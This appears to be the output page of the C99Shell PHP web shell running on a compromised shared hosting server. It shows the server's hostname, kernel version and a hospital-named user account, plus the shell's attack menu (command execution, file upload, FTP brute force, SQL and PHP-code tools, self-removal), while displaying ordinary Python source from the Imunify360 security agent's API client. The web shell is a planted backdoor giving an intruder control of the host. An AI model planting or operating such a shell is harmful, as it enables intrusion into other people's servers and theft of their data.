!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/opt/imunify360/venv/lib/python3.11/site-packages/defence360agent/api/server/   drwxr-xr-x
Free 294.49 GB of 429.69 GB (68.54%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     __init__.py (2.79 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
import asyncio
import http.client
import json
import logging
import socket
import urllib.error
import urllib.request

from defence360agent.contracts.config import Core

logger = logging.getLogger(__name__)


class APIError(Exception):
    def __init__(self, *args, **kwargs) -> None:
        super().__init__(*args, **kwargs)
        if len(args) >= 2:
            _, status_code, *args = args
            self.status_code = status_code
        else:
            self.status_code = None


class APIErrorTooManyRequests(APIError):
    ...


class APITokenError(APIError):
    ...


class FGWSendMessgeException(Exception):
    ...


class API:
    _BASE_URL = Core.API_BASE_URL
    # socket timeout is for blocking operations
    # it should be as less as possible, but for sync api (remote_iplist)
    # we may wait for response for 25 seconds, let's set it to 45 from our side
    _SOCKET_TIMEOUT = 45

    @classmethod
    def request(cls, request: urllib.request.Request, json_loads=True):
        try:
            with urllib.request.urlopen(
                request,
                # agent should be able to wait for a while
                # in lb queue before being connected
                timeout=cls._SOCKET_TIMEOUT,
            ) as response:
                logger.info(
                    "Performed request for url=%s method=%s body size=%s"
                    " status=%s",
                    request.full_url,
                    getattr(request, "method", None),
                    len(request.data) if request.data else 0,
                    response.status,
                )
                if response.status != 200:
                    raise APIError(
                        "status code is {}".format(response.status),
                        response.status,
                    )
                plain_response = response.read()
                logger.info("Response=%s ...", plain_response[:50])
                if json_loads:
                    result = json.loads(plain_response.decode())
                else:
                    result = plain_response
                return result
        except (
            UnicodeDecodeError,
            http.client.HTTPException,
            json.JSONDecodeError,
            socket.timeout,
            urllib.error.URLError,
        ) as e:
            status_code = getattr(e, "code", None)
            if status_code == 429:
                raise APIErrorTooManyRequests(
                    "request failed, reason: %s" % (e,), status_code
                ) from e
            raise APIError(
                "request failed, reason: %s" % (e,), status_code
            ) from e

    @classmethod
    async def async_request(cls, request, executor=None):
        loop = asyncio.get_event_loop()
        return await loop.run_in_executor(executor, cls.request, request)

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.092 ]--